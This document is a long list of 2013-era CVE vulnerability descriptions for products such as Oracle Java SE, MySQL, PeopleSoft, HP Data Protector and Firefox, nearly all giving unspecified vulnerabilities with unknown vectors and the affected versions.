Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper method-invocation restrictions by the MethodUtil trampoline class, which allows remote attackers to bypass the Java sandbox.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK 6 and 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to incorrect MethodHandle lookups, which allows remote attackers to bypass Java sandbox restrictions.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to insufficient "validation of images" in share/native/sun/awt/image/awt_ImageRep.c, possibly involving offsets.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect availability via unknown vectors related to 2D.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "font processing errors" in the International Components for Unicode (ICU) Layout Engine before 51.2.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect availability via unknown vectors related to Networking.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to an information leak involving InetAddress serialization. CVE has not investigated the apparent discrepancy between vendor reports regarding the impact of this issue.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and JavaFX 2.2.7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX, a different vulnerability than CVE-2013-0402, CVE-2013-2427, and CVE-2013-2428.
Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Services.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality via unknown vectors related to Serviceability.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to insufficient indication of an SSL connection failure by JConsole, related to RMI connection dialog box.
Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 7.0, 8.1, and 8.2 allows remote attackers to affect integrity via unknown vectors related to Web Access.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Absence Management.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality and availability via unknown vectors related to Libraries.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "XML security and the class loader."
Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 7.0, 8.1, and 8.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Access.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect integrity via unknown vectors related to Portal, a different vulnerability than CVE-2013-3818.
Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Services, a different vulnerability than CVE-2013-0416.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect integrity via unknown vectors related to WorkCenter.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote authenticated users to affect integrity via unknown vectors related to Portal.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-3744.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Open UI Client.
Unspecified vulnerability in the Oracle Retail Central Office component in Oracle Industry Applications 13.1, 13.2, 13.3, and 13.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Customer Operations (Add, Search).
Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-1567.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, 5.0 Update 41 and earlier, and JavaFX 2.2.7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-2432 and CVE-2013-1491.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.7 and 8.4.0 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters.
Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2, 10.3.5, 10.3.6, and 12.1.1 allows remote attackers to affect integrity via unknown vectors related to WebLogic Console, a different vulnerability than CVE-2013-1504.
Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect availability via unknown vectors related to Mid Tier File Management.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-1569, CVE-2013-2383, and CVE-2013-2420. NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "font layout" in the International Components for Unicode (ICU) Layout Engine before 51.2.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-1569, CVE-2013-2384, and CVE-2013-2420. NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "handling of [a] glyph table" in the International Components for Unicode (ICU) Layout Engine before 51.2.
Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server Privileges.
Unspecified vulnerability in the Oracle JRockit component in Oracle Fusion Middleware R27.7.4 and earlier and R28.2.6 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: this might be a duplicate of CVE-2013-1537 and CVE-2013-2415. If so, then CVE-2013-2380 might be REJECTed in the future.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 2.8.0 through 12.0.1 allows remote authenticated users to affect integrity via unknown vectors related to RT.
Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 2.8.0 through 4.1.0 allows remote authenticated users to affect confidentiality via unknown vectors related to My Services.
Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote authenticated users to affect integrity via unknown vectors related to Rich Text Editor.
Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1671.
Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1670.
Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to cause a denial of service via unknown vectors, aka ZDI-CAN-1669.
Multiple unspecified vulnerabilities in HP SiteScope 11.20 and 11.21, when SOAP is used, allow remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1678.
Unspecified vulnerability in HP Business Process Monitor 9.13.1 patch 1 and 9.22 patch 1 allows remote attackers to execute arbitrary code and obtain sensitive information via unknown vectors, aka ZDI-CAN-1802.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows local users to cause a denial of service via unknown vectors, aka ZDI-CAN-1676.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote authenticated users to cause a denial of service via unknown vectors, a different vulnerability than CVE-2013-2357, CVE-2013-2358, and CVE-2013-2359.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote authenticated users to cause a denial of service via unknown vectors, a different vulnerability than CVE-2013-2357, CVE-2013-2358, and CVE-2013-2360.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote authenticated users to cause a denial of service via unknown vectors, a different vulnerability than CVE-2013-2357, CVE-2013-2359, and CVE-2013-2360.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote authenticated users to cause a denial of service via unknown vectors, a different vulnerability than CVE-2013-2358, CVE-2013-2359, and CVE-2013-2360.
Unspecified vulnerability in HP StoreOnce D2D Backup System 1.x before 1.2.19 and 2.x before 2.3.0 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.00, 9.1x, and 9.2x allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1896.
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1892.
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1870.
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1869.
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1866.
Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance hydra with software before 10.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1510.
Unspecified vulnerability on the HP ProCurve JC###A, JC###B, JD###A, JD###B, JE###A, JF###A, JF###B, JF###C, JG###A, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote authenticated users to execute arbitrary code or obtain sensitive information via unknown vectors.
Unspecified vulnerability on the HP ProCurve JC###A, JC###B, JD###A, JD###B, JE###A, JF###A, JF###B, JF###C, JG###A, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
HP Smart Zero Core 4.3 and 4.3.1 on the t410 All-in-One Smart Zero Client, t410 Smart Zero Client, t510 Flexible Thin Client, t5565z Smart Client, t610 Flexible Thin Client, and t610 PLUS Flexible Thin Client allows local users to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability on HP Integrated Lights-Out 3 (aka iLO3) cards with firmware before 1.57 and 4 (aka iLO4) cards with firmware before 1.22, when Single-Sign-On (SSO) is used, allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1733.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1681.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1680.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1654.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1652.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1638.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1637.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1636.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1635.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1634.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1633.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1629.
Unspecified vulnerability in War FTP Daemon (warftpd) 1.82, when running as a Windows service, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors related to log messages and the "internal log handler to the Windows Event log."
Unspecified vulnerability in the MathML implementation in WebKit in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, has unknown impact and remote attack vectors, related to a "high severity security issue."
Unspecified vulnerability in Citrix Access Gateway Standard Edition 5.0.x before 5.0.4.223524 allows remote attackers to access network resources via unknown attack vectors.
Cross-site request forgery (CSRF) vulnerability in the Services module 6.x-3.x and 7.x-3.x before 7.x-3.4 for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
The cpansign verify functionality in the Module::Signature module before 0.72 for Perl allows attackers to bypass the signature check and execute arbitrary code via a SIGNATURE file with a "special unknown cipher" that references an untrusted module in Digest/.
Cross-site request forgery (CSRF) vulnerability in the elFinder file manager module 6.x-0.x before 6.x-0.8 and 7.x-0.x before 7.x-0.8 for Drupal allows remote attackers to hijack the authentication of unspecified victims to create, modify, or delete files via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in ownCloud Server before 5.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) new_name parameter to apps/bookmarks/ajax/renameTag.php or (2) multiple unspecified parameters to unknown files in apps/contacts/ajax/.
util-linux/mdev.c in BusyBox before 1.21.0 uses 0777 permissions for parent directories when creating nested directories under /dev/, which allows local users to have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 24.0, Thunderbird before 24.0, and SeaMonkey before 2.21 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 24.0, Firefox ESR 17.x before 17.0.9, Thunderbird before 24.0, Thunderbird ESR 17.x before 17.0.9, and SeaMonkey before 2.21 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 23.0 and SeaMonkey before 2.20 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird before 17.0.8, Thunderbird ESR 17.x before 17.0.8, and SeaMonkey before 2.20 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 22.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
The dissect_rohc_ir_packet function in epan/dissectors/packet-rohc.c in the ROHC dissector in Wireshark 1.8.x before 1.8.5 does not properly handle unknown profiles, which allows remote attackers to cause a denial of service (application crash) via a malformed packet.
Unspecified vulnerability in the Javadoc component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier; JavaFX 2.2.21 and earlier; and OpenJDK 7 allows remote attackers to affect integrity via unknown vectors related to Javadoc. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to frame injection in HTML that is generated by Javadoc.
Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote attackers to affect availability via unknown vectors related to MemCached.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "checking of [a] glyph table" in the International Components for Unicode (ICU) Layout Engine before 51.2.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 2.8.0 through 5.3.3, 6.0.1, and 6.2.0 allows remote authenticated users to affect availability via unknown vectors related to CB.
Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-2395.
Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in the Oracle GoldenGate Veridata component in Oracle Fusion Middleware 3.0.0.11 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and JavaFX 2.2.7 and earlier allows remote attackers to affect integrity via unknown vectors related to JavaFX.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and JavaFX 2.2.7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and JavaFX 2.2.7 and earlier allows remote attackers to affect confidentiality via unknown vectors related to JavaFX.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote authenticated users to affect availability via unknown vectors related to Content Server.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans.
Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5.29 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Integration Business Services.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect integrity via unknown vectors related to WorkCenter.
Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Types.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 10.1.3.5, 11.1.1.5.0, and 11.1.1.6.0 allows remote attackers to affect availability via unknown vectors related to Web Listener.
Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Open UI Client.
Unspecified vulnerability in the Oracle Containers for J2EE component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect integrity via unknown vectors related to Servlet Runtime.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-2433.
Unspecified vulnerability in the Network Layer component in Oracle Database Server 11.2.0.2 and 11.2.0.3 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 5.5.05 and 6.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Workload Manager component in Oracle Database Server 11.2.0.2 and 11.2.0.3, when used in RAC configurations, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Privileges.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in the Oracle WebCenter Interaction component in Oracle Fusion Middleware 6.5.1 and 10.3.3.0 allows remote attackers to affect integrity via unknown vectors related to Image Service.
Unspecified vulnerability in the Oracle HRMS component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Payroll.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote authenticated users to affect confidentiality via unknown vectors related to Report Distribution.
Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
Unspecified vulnerability in the Oracle Retail Integration Bus component in Oracle Industry Applications 13.0, 13.1, and 13.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Retail Integration Bus Manager.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.6 and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Attachments.
Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote attackers to affect integrity via unknown vectors related to Content Server.
Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Locking.
Unspecified vulnerability in the Application Express component in Oracle Database Server before 4.2.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors related to Diagnostics.
Unspecified vulnerability in the Oracle WebCenter Capture component in Oracle Fusion Middleware 10.1.3.5.1 allows remote authenticated users to affect availability via unknown vectors related to Import Server.
Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Portal Framework, a different vulnerability than CVE-2015-0419.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 7.6.2, 11.1.1.6.0, and 11.1.1.6.1 allows remote authenticated users to affect integrity via unknown vectors related to WebCenter Sites.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect availability via unknown vectors related to Filesystem.
Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2, 10.3.5, 10.3.6, and 12.1.1 allows remote attackers to affect integrity via unknown vectors related to WebLogic Console, a different vulnerability than CVE-2013-2390.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Content Server.
Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 and earlier allows local users to affect availability via unknown vectors related to Server Partition.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to Login.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows local users to affect confidentiality and integrity via unknown vectors related to 2D.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to weak permissions for shared memory.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to Network Configuration.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect availability via unknown vectors related to Kernel/IO, a different vulnerability than CVE-2013-1496.
Unspecified vulnerability in the Oracle COREid Access component in Oracle Fusion Middleware 10.1.4.3.0 allows remote attackers to affect integrity via unknown vectors related to WebGate - WebServer plugin.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect availability via unknown vectors related to Kernel/IO, a different vulnerability than CVE-2013-1498.
Unspecified vulnerability in Oracle Sun Solaris 10, when running on SPARC T4 servers, allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 10 and Update 11, when running on Windows using Internet Explorer, Firefox, Opera, and Google Chrome, allows remote attackers to bypass the "Very High" security level of the Java Control Panel and execute unsigned Java code without prompting the user via unknown vectors, aka "Issue 53" and the "Java Security Slider" vulnerability.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE 7 Update 13 and earlier and 6 Update 39 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 13 and earlier allows remote attackers to affect integrity via unknown vectors related to Libraries.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 13 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
